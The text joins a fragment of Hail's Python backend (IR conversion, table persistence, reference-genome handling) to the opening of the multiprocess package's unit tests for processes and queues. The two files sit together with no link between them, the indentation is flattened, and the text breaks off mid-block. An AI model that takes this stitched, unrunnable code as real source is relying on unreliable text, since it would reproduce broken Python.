if not hasattr(ir, '_jir'):
r = CSERenderer(stop_at_jir=True)
# FIXME parse should be static
ir._jir = parse(r(ir), ir_map=r.jirs)
return ir._jir
def _to_java_value_ir(self, ir):
return self._to_java_ir(ir, self._parse_value_ir)
def _to_java_table_ir(self, ir):
return self._to_java_ir(ir, self._parse_table_ir)
def _to_java_matrix_ir(self, ir):
return self._to_java_ir(ir, self._parse_matrix_ir)
def _to_java_blockmatrix_ir(self, ir):
return self._to_java_ir(ir, self._parse_blockmatrix_ir)
def value_type(self, ir):
jir = self._to_java_value_ir(ir)
return dtype(jir.typ().toString())
def table_type(self, tir):
jir = self._to_java_table_ir(tir)
return ttable._from_java(jir.typ())
def matrix_type(self, mir):
jir = self._to_java_matrix_ir(mir)
return tmatrix._from_java(jir.typ())
def persist_table(self, t, storage_level):
return Table._from_java(self._jbackend.pyPersistTable(storage_level, self._to_java_table_ir(t._tir)))
def unpersist_table(self, t):
return Table._from_java(self._to_java_table_ir(t._tir).pyUnpersist())
def persist_matrix_table(self, mt, storage_level):
return MatrixTable._from_java(self._jbackend.pyPersistMatrix(storage_level, self._to_java_matrix_ir(mt._mir)))
def unpersist_matrix_table(self, mt):
return MatrixTable._from_java(self._to_java_matrix_ir(mt._mir).pyUnpersist())
def unpersist_block_matrix(self, id):
self._jhc.backend().unpersist(id)
def blockmatrix_type(self, bmir):
jir = self._to_java_blockmatrix_ir(bmir)
return tblockmatrix._from_java(jir.typ())
def from_spark(self, df, key):
return Table._from_java(self._jbackend.pyFromDF(df._jdf, key))
def to_spark(self, t, flatten):
t = t.expand_types()
if flatten:
t = t.flatten()
return pyspark.sql.DataFrame(self._jbackend.pyToDF(self._to_java_table_ir(t._tir)),
Env.spark_session()._wrapped)
def add_reference(self, config):
Env.hail().variant.ReferenceGenome.fromJSON(json.dumps(config))
def load_references_from_dataset(self, path):
return json.loads(Env.hail().variant.ReferenceGenome.fromHailDataset(self.fs._jfs, path))
def from_fasta_file(self, name, fasta_file, index_file, x_contigs, y_contigs, mt_contigs, par):
self._jbackend.pyFromFASTAFile(
name, fasta_file, index_file, x_contigs, y_contigs, mt_contigs, par)
def remove_reference(self, name):
Env.hail().variant.ReferenceGenome.removeReference(name)
def get_reference(self, name):
return json.loads(Env.hail().variant.ReferenceGenome.getReference(name).toJSONString())
def add_sequence(self, name, fasta_file, index_file):
self._jbackend.pyAddSequence(name, fasta_file, index_file)
def remove_sequence(self, name):
scala_object(Env.hail().variant, 'ReferenceGenome').removeSequence(name)
def add_liftover(self, name, chain_file, dest_reference_genome):
self._jbackend.pyReferenceAddLiftover(name, chain_file, dest_reference_genome)
def remove_liftover(self, name, dest_reference_genome):
scala_object(Env.hail().variant, 'ReferenceGenome').referenceRemoveLiftover(
name, dest_reference_genome)
def parse_vcf_metadata(self, path):
return json.loads(self._jhc.pyParseVCFMetadataJSON(self.fs._jfs, path))
def index_bgen(self, files, index_file_map, rg, contig_recoding, skip_invalid_loci):
self._jbackend.pyIndexBgen(files, index_file_map, rg, contig_recoding, skip_invalid_loci)
def import_fam(self, path: str, quant_pheno: bool, delimiter: str, missing: str):
return json.loads(self._jbackend.pyImportFam(path, quant_pheno, delimiter, missing))
def register_ir_function(self, name, type_parameters, argument_names, argument_types, return_type, body):
r = CSERenderer(stop_at_jir=True)
code = r(body._ir)
jbody = (self._parse_value_ir(code, ref_map=dict(zip(argument_names, argument_types)), ir_map=r.jirs))
Env.hail().expr.ir.functions.IRFunctionRegistry.pyRegisterIR(
name,
[ta._parsable_string() for ta in type_parameters],
argument_names, [pt._parsable_string() for pt in argument_types],
return_type._parsable_string(),
jbody)
def persist_ir(self, ir):
return JavaIR(self._jhc.backend().executeLiteral(self._to_java_value_ir(ir)))
def read_multiple_matrix_tables(self, paths: 'List[str]', intervals: 'List[hl.Interval]', intervals_type):
json_repr = {
'paths': paths,
'intervals': intervals_type._convert_to_json(intervals),
'intervalPointType': intervals_type.element_type.point_type._parsable_string(),
}
results = self._jhc.backend().pyReadMultipleMatrixTables(json.dumps(json_repr))
return [MatrixTable._from_java(jm) for jm in results]
|
__init__.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle #XXX: use dill?
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = import_helper.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
import_helper.import_module('multiprocess.synchronize')
import threading
import multiprocess as multiprocessing
import multiprocess.connection
import multiprocess.dummy
import multiprocess.heap
import multiprocess.managers
import multiprocess.pool
import multiprocess.queues
from multiprocess import util
try:
from multiprocess import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocess.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocess import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocess import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocess.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocess.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def _test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocess.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(os_helper.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocess.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = os_helper.TESTFN
self.addCleanup(os_helper.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, encoding="utf-8") as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("__init__.py", err)
#self.assertIn("1/0 # MARKER", err) #FIXME
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', encoding="utf-8", closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', encoding="utf-8", closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = os_helper.TESTFN
self.addCleanup(os_helper.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, encoding="utf-8") as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with os_helper.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w', encoding="utf-8") as f:
f.write("""if 1:
import multiprocess as multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with import_helper.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
